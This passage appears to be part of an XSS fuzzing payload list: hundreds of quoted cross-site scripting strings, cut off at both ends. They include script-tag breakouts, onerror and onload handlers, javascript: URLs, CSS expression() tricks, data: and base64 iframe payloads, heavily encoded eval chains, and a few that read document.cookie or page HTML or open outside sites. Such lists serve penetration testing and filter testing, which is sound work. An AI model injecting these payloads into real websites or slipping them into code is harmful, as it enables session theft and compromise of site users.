alert(1); </script>', '\'><script> var x = "X\\"; alert(1); </script>', '</ScrIpt><script> var x = "X\\"; alert(1); </script>', '<img src="1" onerror="alert(1)">', '"><img src="1" onerror="alert(1)">', '\'><img src="1" onerror="alert(1)">', '<img src="" onload=alert(1)>', '"><img src="" onload=alert(1)>', '\'><img src="" onload=alert(1)>', '<script> function a() {} </script> <img src=1 onerror="a();alert(1)">', '</ScrIpt><script> function a() {} </script> <img src=1 onerror="a();alert(1)">', '"><script> function a() {} </script> <img src=1 onerror="a();alert(1)">', '</ScrIpt><script> function a() {} </script> <img src=1 onerror="a();alert(1)">', '\'><script> function a() {} </script> <img src=1 onerror="a();alert(1)">', '</ScrIpt><script> function a() {} </script> <img src=1 onerror="a();alert(1)">', '<img src=1 onerror="alert(1)">', '"><img src=1 onerror="alert(1)">', '\'><img src=1 onerror="alert(1)">', '<img src=1 onerror"alert(1)">', '"><img src=1 onerror"alert(1)">', '\'><img src=1 onerror"alert(1)">', '<svg><script>lo<sv>gChr(1)</script></svg>', '"><svg><script>lo<sv>gChr(1)</script></svg>', "'><svg><script>lo<sv>gChr(1)</script></svg>", '<img src=# aaa;onerror="alert(1)">', '"><img src=# aaa;onerror="alert(1)">', '\'><img src=# aaa;onerror="alert(1)">', '<a href=x onerror=alert(1)>', '"><a href=x onerror=alert(1)>', "'><a href=x onerror=alert(1)>", '<script> var x = "asdf\\1 asdf"; alert(1); </script>', '</ScrIpt><script> var x = "asdf\\1 asdf"; alert(1); </script>', '"><script> var x = "asdf\\1 asdf"; alert(1); </script>', '</ScrIpt><script> var x = "asdf\\1 asdf"; alert(1); </script>', '\'><script> var x = "asdf\\1 asdf"; alert(1); </script>', '</ScrIpt><script> var x = "asdf\\1 asdf"; alert(1); </script>', '<img src=xx:xx;onerror=alert(1)>', '"><img src=xx:xx;onerror=alert(1)>', "'><img src=xx:xx;onerror=alert(1)>", '<img src=x > onerror="console.alert(document.getElementsByTagName(\'html\')[0].innerHTML)">', '"><img src=x > onerror="console.alert(document.getElementsByTagName(\'html\')[0].innerHTML)">', '\'><img src=x > onerror="console.alert(document.getElementsByTagName(\'html\')[0].innerHTML)">', "<script> chr=String.fromCharCode(1); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", "</ScrIpt><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", '"><script> chr=String.fromCharCode(1); result=\'\'; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>', "</ScrIpt><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", "'><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", "</ScrIpt><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", "<script> chr=String.fromCharCode(1); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", "</ScrIpt><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", '"><script> chr=String.fromCharCode(1); result=\'\'; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>', "</ScrIpt><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", "'><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", "</ScrIpt><script> chr=String.fromCharCode(1); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(1); } </script>", '<img src=x > onerror=alert(1)>', '"><img src=x > onerror=alert(1)>', "'><img src=x > onerror=alert(1)>", '<svg><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script></svg>', '<img src=xx:xx onerror="&#X61;lert(1);alert(1)">', '"><img src=xx:xx onerror="&#X61;lert(1);alert(1)">', '\'><img src=xx:xx onerror="&#X61;lert(1);alert(1)">', "<img src=xx:xx onerror=window[['alert']](1)>", '"><img src=xx:xx onerror=window[[\'alert\']](1)>', "'><img src=xx:xx onerror=window[['alert']](1)>", '"\'><img src="xx:xx" on error="alert(1);">', '<img src=xx:xx onerror=alert(1)>', '"><img src=xx:xx onerror=alert(1)>', "'><img src=xx:xx onerror=alert(1)>", '<img src=xx:xx onerror =alert(1);>', '"><img src=xx:xx onerror =alert(1);>', "'><img src=xx:xx onerror =alert(1);>", '<META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?;URL=javascript:alert(1)//">', '"><META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?;URL=javascript:alert(1)//">', '\'><META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?;URL=javascript:alert(1)//">', '<meta http-equiv=refresh content="javascript:alert(\'1\')">', '"><meta http-equiv=refresh content="javascript:alert(\'1\')">', '\'><meta http-equiv=refresh content="javascript:alert(\'1\')">', '<a href="javascript:alert(1)">X</a>', '"><a href="javascript:alert(1)">X</a>', '\'><a href="javascript:alert(1)">X</a>', "<script> document.cookie='X'; if(document.cookie !== 'X') { alert(1,document.cookie); } </script>", "</ScrIpt><script> document.cookie='X'; if(document.cookie !== 'X') { alert(1,document.cookie); } </script>", '"><script> document.cookie=\'X\'; if(document.cookie !== \'X\') { alert(1,document.cookie); } </script>', "</ScrIpt><script> document.cookie='X'; if(document.cookie !== 'X') { alert(1,document.cookie); } </script>", "'><script> document.cookie='X'; if(document.cookie !== 'X') { alert(1,document.cookie); } </script>", "</ScrIpt><script> document.cookie='X'; if(document.cookie !== 'X') { alert(1,document.cookie); } </script>", 'htmlStr = \'<a href="javascript:alert(1)">X</a>', '"><a href="javascript:alert(1)">X</a>', '\'><a href="javascript:alert(1)">X</a>\'; document.getElementById(\'body\').innerHTML = htmlStr; try { alert(1);}catch(e){alert(1);};', 'htmlStr = \'<a href="javascript:alert(1)">X</a>', '"><a href="javascript:alert(1)">X</a>', '\'><a href="javascript:alert(1)">X</a>\'; document.getElementById(\'body\').innerHTML = htmlStr; try { if(document.getElementById(\'body\').firstChild.protocol === \'javascript:\') { alert(1); } }catch(e){alert(1);};', '<img src=x:xx onerror="try {execScript(\'a=1\',\'vbs\');alert(1);}catch(e){alert(1);}">', '"><img src=x:xx onerror="try {execScript(\'a=1\',\'vbs\');alert(1);}catch(e){alert(1);}">', '\'><img src=x:xx onerror="try {execScript(\'a=1\',\'vbs\');alert(1);}catch(e){alert(1);}">', '<div style="color:red\'{} x:expression(alert(1))">.</div>', '"><div style="color:red\'{} x:expression(alert(1))">.</div>', '\'><div style="color:red\'{} x:expression(alert(1))">.</div>', "<img src='xx:x><img src=xx:x onerror=alert(1)>'>", '"><img src=\'xx:x><img src=xx:x onerror=alert(1)>\'>', "'><img src='xx:x><img src=xx:x onerror=alert(1)>'>", '<img src=\'xx:x\\ onerror="alert(1)">\'>', '"><img src=\'xx:x\\ onerror="alert(1)">\'>', '\'><img src=\'xx:x\\ onerror="alert(1)">\'>', '<img src=\'xx:x onerror="alert(1)">\'>', '"><img src=\'xx:x onerror="alert(1)">\'>', '\'><img src=\'xx:x onerror="alert(1)">\'>', '`"\'><img src="# onerror=alert(1)>', '<img src=xx:xx onerror="x=\'\\\',alert(1)//\'">', '"><img src=xx:xx onerror="x=\'\\\',alert(1)//\'">', '\'><img src=xx:xx onerror="x=\'\\\',alert(1)//\'">', '<script>alert(alert(1))</script>', '</ScrIpt><script>alert(alert(1))</script>', '"><script>alert(alert(1))</script>', '</ScrIpt><script>alert(alert(1))</script>', "'><script>alert(alert(1))</script>", '</ScrIpt><script>alert(alert(1))</script>', "<script>x='<script><img src=xx:xx onerror=alert(1)>", '"><img src=xx:xx onerror=alert(1)>', "'><img src=xx:xx onerror=alert(1)>';</script>", '<script>alert(1)<script></script>', '</ScrIpt><script>alert(1)<script></script>', '"><script>alert(1)<script></script>', '</ScrIpt><script>alert(1)<script></script>', "'><script>alert(1)<script></script>", '</ScrIpt><script>alert(1)<script></script>', '--><img src=xxx:x onerror=alert(1)> -->', '<img src=xx:xx# /onerror=alert(1)>', '"><img src=xx:xx# /onerror=alert(1)>', "'><img src=xx:xx# /onerror=alert(1)>", '<img src=xx:xx alt=`/onerror=alert(1)//`>', '"><img src=xx:xx alt=`/onerror=alert(1)//`>', "'><img src=xx:xx alt=`/onerror=alert(1)//`>", '<img src=xx:xx onerror=alert(1)>', '"><img src=xx:xx onerror=alert(1)>', "'><img src=xx:xx onerror=alert(1)> <a href=javascript:alert(1)>1</a>", '"><img src=xx:xx onerror=alert(1)> <a href=javascript:alert(1)>1</a>', "'><img src=xx:xx onerror=alert(1)> <a href=javascript:alert(1)>1</a>", '<script>alert(1,1</script//)</script>', '</ScrIpt><script>alert(1,1</script//)</script>', '"><script>alert(1,1</script//)</script>', '</ScrIpt><script>alert(1,1</script//)</script>', "'><script>alert(1,1</script//)</script>", '</ScrIpt><script>alert(1,1</script//)</script>', '<script>alert(1,1</script/)</script>', '</ScrIpt><script>alert(1,1</script/)</script>', '"><script>alert(1,1</script/)</script>', '</ScrIpt><script>alert(1,1</script/)</script>', "'><script>alert(1,1</script/)</script>", '</ScrIpt><script>alert(1,1</script/)</script>', '<body> ?iframe onload=confirm(/X/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace(\'?\',\'<\')"> </body>', '"><body> ?iframe onload=confirm(/X/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace(\'?\',\'<\')"> </body>', '\'><body> ?iframe onload=confirm(/X/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace(\'?\',\'<\')"> </body>', '<b id="id1" x=begin0x9fa0end >`\'"></b><script>if (!/begin.end/.test(document.getElementById(\'id1\').getAttribute(\'x\'))) { alert(1);}</script>', '"><b id="id1" x=begin0x9fa0end >`\'"></b><script>if (!/begin.end/.test(document.getElementById(\'id1\').getAttribute(\'x\'))) { alert(1);}</script>', '\'><b id="id1" x=begin0x9fa0end >`\'"></b><script>if (!/begin.end/.test(document.getElementById(\'id1\').getAttribute(\'x\'))) { alert(1);}</script>', '<b id="id1" x=begin0x2924end >`\'"></b><script>if (!/begin.end/.test(document.getElementById(\'id1\').getAttribute(\'x\'))) { alert(1);}</script>', '"><b id="id1" x=begin0x2924end >`\'"></b><script>if (!/begin.end/.test(document.getElementById(\'id1\').getAttribute(\'x\'))) { alert(1);}</script>', '\'><b id="id1" x=begin0x2924end >`\'"></b><script>if (!/begin.end/.test(document.getElementById(\'id1\').getAttribute(\'x\'))) { alert(1);}</script>', '<img src=# onerror="alert(1)" >', '"><img src=# onerror="alert(1)" >', '\'><img src=# onerror="alert(1)" >', '<title>X<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script></title>', '<div style="X:expression(alert(1))\\"></div>', '"><div style="X:expression(alert(1))\\"></div>', '\'><div style="X:expression(alert(1))\\"></div>', '<div style="X:expression(alert(1))\'"></div>', '"><div style="X:expression(alert(1))\'"></div>', '\'><div style="X:expression(alert(1))\'"></div>', '<div style="X:expression(alert(1))"></div>', '"><div style="X:expression(alert(1))"></div>', '\'><div style="X:expression(alert(1))"></div>', '<div style="X:expression(alert(1))">X/div>', '"><div style="X:expression(alert(1))">X/div>', '\'><div style="X:expression(alert(1))">X/div>', '<img src=1 title= x:xx/onerror=alert(1)>', '"><img src=1 title= x:xx/onerror=alert(1)>', "'><img src=1 title= x:xx/onerror=alert(1)>", '<script>if("x\\".length==2) { alert(1);}</script>', '</ScrIpt><script>if("x\\".length==2) { alert(1);}</script>', '"><script>if("x\\".length==2) { alert(1);}</script>', '</ScrIpt><script>if("x\\".length==2) { alert(1);}</script>', '\'><script>if("x\\".length==2) { alert(1);}</script>', '</ScrIpt><script>if("x\\".length==2) { alert(1);}</script>', '<script>if("x\\".length==1) { alert(1);}</script>', '</ScrIpt><script>if("x\\".length==1) { alert(1);}</script>', '"><script>if("x\\".length==1) { alert(1);}</script>', '</ScrIpt><script>if("x\\".length==1) { alert(1);}</script>', '\'><script>if("x\\".length==1) { alert(1);}</script>', '</ScrIpt><script>if("x\\".length==1) { alert(1);}</script>', '<img src=xxx:xxx title=1/onerror=alert(1)>', '"><img src=xxx:xxx title=1/onerror=alert(1)>', "'><img src=xxx:xxx title=1/onerror=alert(1)>", '<script>if("xx" == "xx") { alert(1);}</script>', '</ScrIpt><script>if("xx" == "xx") { alert(1);}</script>', '"><script>if("xx" == "xx") { alert(1);}</script>', '</ScrIpt><script>if("xx" == "xx") { alert(1);}</script>', '\'><script>if("xx" == "xx") { alert(1);}</script>', '</ScrIpt><script>if("xx" == "xx") { alert(1);}</script>', '<img src=x onError="javascript:alert(1)"/>', '"><img src=x onError="javascript:alert(1)"/>', '\'><img src=x onError="javascript:alert(1)"/>', '"`\'><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '<script type="text/javascript">alert(1);</script>', '"><script type="text/javascript">alert(1);</script>', '\'><script type="text/javascript">alert(1);</script>', "<script charset='utf-8'>alert(1)</script>", '"><script charset=\'utf-8\'>alert(1)</script>', "'><script charset='utf-8'>alert(1)</script>", '<style></style><img src="about:blank" onerror=alert(1)//></style>', '"><style></style><img src="about:blank" onerror=alert(1)//></style>', '\'><style></style><img src="about:blank" onerror=alert(1)//></style>', "<script>a='X\\\\';alert(1)//X';</script>", "</ScrIpt><script>a='X\\\\';alert(1)//X';</script>", '"><script>a=\'X\\\\\';alert(1)//X\';</script>', "</ScrIpt><script>a='X\\\\';alert(1)//X';</script>", "'><script>a='X\\\\';alert(1)//X';</script>", "</ScrIpt><script>a='X\\\\';alert(1)//X';</script>", '<script>try{eval("<></>");alert(1)}catch(e){alert(1)};</script>', '</ScrIpt><script>try{eval("<></>");alert(1)}catch(e){alert(1)};</script>', '"><script>try{eval("<></>");alert(1)}catch(e){alert(1)};</script>', '</ScrIpt><script>try{eval("<></>");alert(1)}catch(e){alert(1)};</script>', '\'><script>try{eval("<></>");alert(1)}catch(e){alert(1)};</script>', '</ScrIpt><script>try{eval("<></>");alert(1)}catch(e){alert(1)};</script>', '<div class="foo1">X</div> <script>document.getElementsByClassName(\'foo1\')[0]?alert(1):0</script>', '"><div class="foo1">X</div> <script>document.getElementsByClassName(\'foo1\')[0]?alert(1):0</script>', '\'><div class="foo1">X</div> <script>document.getElementsByClassName(\'foo1\')[0]?alert(1):0</script>', '"`\'/><img/onload=alert(1) src=""/>', '<!--<img src=xxx:x onerror=alert(1)> -->', '"><!--<img src=xxx:x onerror=alert(1)> -->', "'><!--<img src=xxx:x onerror=alert(1)> -->", '<script>/* */alert(1)// */</script>', '</ScrIpt><script>/* */alert(1)// */</script>', '"><script>/* */alert(1)// */</script>', '</ScrIpt><script>/* */alert(1)// */</script>', "'><script>/* */alert(1)// */</script>", '</ScrIpt><script>/* */alert(1)// */</script>', '"\'`>X<div style="font-family:\'foo;x:expression(alert(1));/*\';">X', '"\'`>X<div style="font-family:\'foo\'x:expression(alert(1));/*\';">X', '"\'`><script>a=/X;;i=0;alert(1);a/i;</script>', '<a href="><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>" />', '"\'`><p><svg><script>a=\'X;alert(1)//\';</script></p>', '<p><svg><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script></p>', '<iframe src="vbscript:alert()></iframe>', '"><iframe src="vbscript:alert()></iframe>', '\'><iframe src="vbscript:alert()></iframe>', 'X<div style="x:expression(alert(1))">X', 'X<div style="xexpression(alert(1))">X', '<script src="data:text/plainalert(1)"></script>', '"><script src="data:text/plainalert(1)"></script>', '\'><script src="data:text/plainalert(1)"></script>', '<script src="data:,alert(1)"></script>', '"><script src="data:,alert(1)"></script>', '\'><script src="data:,alert(1)"></script>', '<script src="data:text/plain,alert(1)"></script>', '"><script src="data:text/plain,alert(1)"></script>', '\'><script src="data:text/plain,alert(1)"></script>', "<script> if ('a'.trim() === '') { alert(1); } </script>", "</ScrIpt><script> if ('a'.trim() === '') { alert(1); } </script>", '"><script> if (\'a\'.trim() === \'\') { alert(1); } </script>', "</ScrIpt><script> if ('a'.trim() === '') { alert(1); } </script>", "'><script> if ('a'.trim() === '') { alert(1); } </script>", "</ScrIpt><script> if ('a'.trim() === '') { alert(1); } </script>", '"\'`><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '"\'`><img src=xxx:x onerror=alert(1)>', '\'`"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '`"\'><img src=xxx:x onerror=alert(1)>', '\'"`><script>/* *alert(1)// */</script>', '`\'"><script>window[\'alert\'](1)</script>', "\\u0031+\\u0031\\u005b'\\145\\166\\141\\154'\\u005d\\u0028'\\141\\154\\145\\162\\164\\50\\61\\51'\\u0029", '\\u0030\\u005b\\u0022\\x65\\x76\\x61\\x6C"\\u005d\\u0028\\u0027\\x61\\x6C\\x65\\x72\\x74\\x28\\x31\\x29\'\\u0029', "0['eval']('alert(1)')", '<a href="javascript:\\u0031+\\u0031\\u005b\'\\145\\166\\141\\154\'\\u005d\\u0028\'\\141\\154\\145\\162\\164\\50\\61\\51\'\\u0029">X</a>', '"><a href="javascript:\\u0031+\\u0031\\u005b\'\\145\\166\\141\\154\'\\u005d\\u0028\'\\141\\154\\145\\162\\164\\50\\61\\51\'\\u0029">X</a>', '\'><a href="javascript:\\u0031+\\u0031\\u005b\'\\145\\166\\141\\154\'\\u005d\\u0028\'\\141\\154\\145\\162\\164\\50\\61\\51\'\\u0029">X</a>', '<a href="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x5C&#x75&#x30&#x30&#x33&#x31&#x2B&#x5C&#x75&#x30&#x30&#x33&#x31&#x5C&#x75&#x30&#x30&#x35&#x62&#x27&#x5C&#x31&#x34&#x35&#x5C&#x31&#x36&#x36&#x5C&#x31&#x34&#x31&#x5C&#x31&#x35&#x34&#x27&#x5C&#x75&#x30&#x30&#x35&#x64&#x5C&#x75&#x30&#x30&#x32&#x38&#x27&#x5C&#x31&#x34&#x31&#x5C&#x31&#x35&#x34&#x5C&#x31&#x34&#x35&#x5C&#x31&#x36&#x32&#x5C&#x31&#x36&#x34&#x5C&#x35&#x30&#x5C&#x36&#x31&#x5C&#x35&#x31&#x27&#x5C&#x75&#x30&#x30&#x32&#x39">X</a>', '"><a href="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x5C&#x75&#x30&#x30&#x33&#x31&#x2B&#x5C&#x75&#x30&#x30&#x33&#x31&#x5C&#x75&#x30&#x30&#x35&#x62&#x27&#x5C&#x31&#x34&#x35&#x5C&#x31&#x36&#x36&#x5C&#x31&#x34&#x31&#x5C&#x31&#x35&#x34&#x27&#x5C&#x75&#x30&#x30&#x35&#x64&#x5C&#x75&#x30&#x30&#x32&#x38&#x27&#x5C&#x31&#x34&#x31&#x5C&#x31&#x35&#x34&#x5C&#x31&#x34&#x35&#x5C&#x31&#x36&#x32&#x5C&#x31&#x36&#x34&#x5C&#x35&#x30&#x5C&#x36&#x31&#x5C&#x35&#x31&#x27&#x5C&#x75&#x30&#x30&#x32&#x39">X</a>', '\'><a href="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x5C&#x75&#x30&#x30&#x33&#x31&#x2B&#x5C&#x75&#x30&#x30&#x33&#x31&#x5C&#x75&#x30&#x30&#x35&#x62&#x27&#x5C&#x31&#x34&#x35&#x5C&#x31&#x36&#x36&#x5C&#x31&#x34&#x31&#x5C&#x31&#x35&#x34&#x27&#x5C&#x75&#x30&#x30&#x35&#x64&#x5C&#x75&#x30&#x30&#x32&#x38&#x27&#x5C&#x31&#x34&#x31&#x5C&#x31&#x35&#x34&#x5C&#x31&#x34&#x35&#x5C&#x31&#x36&#x32&#x5C&#x31&#x36&#x34&#x5C&#x35&#x30&#x5C&#x36&#x31&#x5C&#x35&#x31&#x27&#x5C&#x75&#x30&#x30&#x32&#x39">X</a>', "<input id='1'><input id=1><script>alert(1)</script>", '"><input id=\'1\'><input id=1><script>alert(1)</script>', "'><input id='1'><input id=1><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '<a href="invalid:1" id=x name=y>X</a><a href="invalid:2" id=x name=y>X</a><script>alert(x.y[0])</script>', '"><a href="invalid:1" id=x name=y>X</a><a href="invalid:2" id=x name=y>X</a><script>alert(x.y[0])</script>', '\'><a href="invalid:1" id=x name=y>X</a><a href="invalid:2" id=x name=y>X</a><script>alert(x.y[0])</script>', '<a href=1 name=x>X</a><a href=1 name=x>X</a><script>alert(x.removeChild)//undefinedalert(x.parentNode)//undefined</script>', '"><a href=1 name=x>X</a><a href=1 name=x>X</a><script>alert(x.removeChild)//undefinedalert(x.parentNode)//undefined</script>', "'><a href=1 name=x>X</a><a href=1 name=x>X</a><script>alert(x.removeChild)//undefinedalert(x.parentNode)//undefined</script>", '<a href="123" id=x>X</a><script>x=\'javascript:alert(1)\'//only in compat!;</script>', '"><a href="123" id=x>X</a><script>x=\'javascript:alert(1)\'//only in compat!;</script>', '\'><a href="123" id=x>X</a><script>x=\'javascript:alert(1)\'//only in compat!;</script>', '<form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)">', '"><form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)">', '\'><form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>', '"><form name=self location="javascript:alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>', '\'><form name=self location="javascript:alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>', '<form name=self location="javascript&amp;#58;alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>', '"><form name=self location="javascript&amp;#58;alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>', '\'><form name=self location="javascript&amp;#58;alert(1)"></form><script>if(top!=self){ top.location=self.location}</script>', '<iframe name=x></iframe>"></iframe><a href="http://127.0.0.1:3555/xss_serve_payloads/X.html" target=x id=x></a><script>window.onload=function(){x.click()}</script>', '"><iframe name=x></iframe>"></iframe><a href="http://127.0.0.1:3555/xss_serve_payloads/X.html" target=x id=x></a><script>window.onload=function(){x.click()}</script>', '\'><iframe name=x></iframe>"></iframe><a href="http://127.0.0.1:3555/xss_serve_payloads/X.html" target=x id=x></a><script>window.onload=function(){x.click()}</script>', '%3Cform%20name%3D%22body%22%20onmouseover%3D%22alert(1)%22%20style%3D%22height%3A800px%22%3E%3Cfieldset%20name%3D%22attributes%22%3E%3Cform%3E%3C%2Fform%3E%3Cform%20name%3D%22parentNode%22%3E%3Cimg%20id%3D%22attributes%22%3E%3C%2Fform%3E%3C%2Ffieldset%3E%3C%2Fform%3E', '"onmouseover="alert(1)"a="', "'onmouseover='alert(1)'a='", "'%20onmouseover=alert(1)'", '%22%20onmouseover=javascript:alert(1)%20%22', "\\');alert(1);//", ');alert(1)//', "');alert(1)//", '%26%2339;-alert(1)//', '%22);alert(1);//', '%E0<body onload=alert(1)>', '%00<body onload=alert(1)>', "X'%20alert(1)%2F%2F", 'X%22%20alert(1)%2F%2F', "%5C%5C'%2Balert(1)%3B%2F%2F", '%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E', 'alert(1)%3B', '%3Cscript%3Ea%3D%2FX%2F', 'alert(1)%3C%2Fscript%3E', '%22%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E', 'X%20-%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E', 'X%20%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E', '<SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '"><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', "'><SCRIPT>alert(1);</SCRIPT>", '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '<META HTTP-EQUIV="Link" Content="<javascript:alert(1)>; REL=stylesheet">', '"><META HTTP-EQUIV="Link" Content="<javascript:alert(1)>; REL=stylesheet">', '\'><META HTTP-EQUIV="Link" Content="<javascript:alert(1)>; REL=stylesheet">', '<STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE>', '"><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE>', '\'><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE><A CLASS=X></A>', '"><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE><A CLASS=X></A>', '\'><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE><A CLASS=X></A>', '"><A CLASS=X></A>', "'><A CLASS=X></A>", '<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert(1);">', '"><!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert(1);">', '\'><!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert(1);">', '<img src=a onerror=alert(1)', '"><img src=a onerror=alert(1)', "'><img src=a onerror=alert(1) %0A>", '"><img src=a onerror=alert(1) %0A>', "'><img src=a onerror=alert(1) %0A>", '<img src="x" class="\'\'onerror=alert(1)">', '"><img src="x" class="\'\'onerror=alert(1)">', '\'><img src="x" class="\'\'onerror=alert(1)">', '0<aside xmlns="x><img src=x onerror=alert(1)">1</aside>', '0<aside xmlns="x><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>">1</aside>', '0<aside xmlns="foo:img src=x onerror=alert(1)>">123', '<p style="font-family:\'\\22\\3bx:expression(alert(1))/*\'">', '"><p style="font-family:\'\\22\\3bx:expression(alert(1))/*\'">', '\'><p style="font-family:\'\\22\\3bx:expression(alert(1))/*\'">', '<p style="font-family: \'foo\\27\\3b color\\3a expression(alert(1))/*', '"><p style="font-family: \'foo\\27\\3b color\\3a expression(alert(1))/*', '\'><p style="font-family: \'foo\\27\\3b color\\3a expression(alert(1))/*', '<p style="fon\\22\\3e\\3cimg\\20src\\3dx\\20onerror\\3d alert\\28 1\\29\\3et-family:\'foobar\'">', '"><p style="fon\\22\\3e\\3cimg\\20src\\3dx\\20onerror\\3d alert\\28 1\\29\\3et-family:\'foobar\'">', '\'><p style="fon\\22\\3e\\3cimg\\20src\\3dx\\20onerror\\3d alert\\28 1\\29\\3et-family:\'foobar\'">', '<p style="filter: \'expression(alert(1))\'">', '"><p style="filter: \'expression(alert(1))\'">', '\'><p style="filter: \'expression(alert(1))\'">', '<svg><style>&ltimg src=x onerror=alert(1)&gt</svg>', '"><svg><style>&ltimg src=x onerror=alert(1)&gt</svg>', "'><svg><style>&ltimg src=x onerror=alert(1)&gt</svg>", '<p style="font-family: \'foo&amp;x5c;27&amp;#x5c;3bx:expr&amp;#x65;ession(alert(1))\'">', '"><p style="font-family: \'foo&amp;x5c;27&amp;#x5c;3bx:expr&amp;#x65;ession(alert(1))\'">', '\'><p style="font-family: \'foo&amp;x5c;27&amp;#x5c;3bx:expr&amp;#x65;ession(alert(1))\'">', '<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">', '"><iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">', '\'><iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">', "<svg><script xlink:href=data&colon;,window.open('http://www.opensecurity.in')></script", '"><svg><script xlink:href=data&colon;,window.open(\'http://www.opensecurity.in\')></script', "'><svg><script xlink:href=data&colon;,window.open('http://www.opensecurity.in')></script", 'http://www.opensecurity<script .in>alert(document.location)</script', '&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver', '<div/style="width:expression(confirm(1))">X</div>', '"><div/style="width:expression(confirm(1))">X</div>', '\'><div/style="width:expression(confirm(1))">X</div>', 'perl -e \'print "&lt;IMG 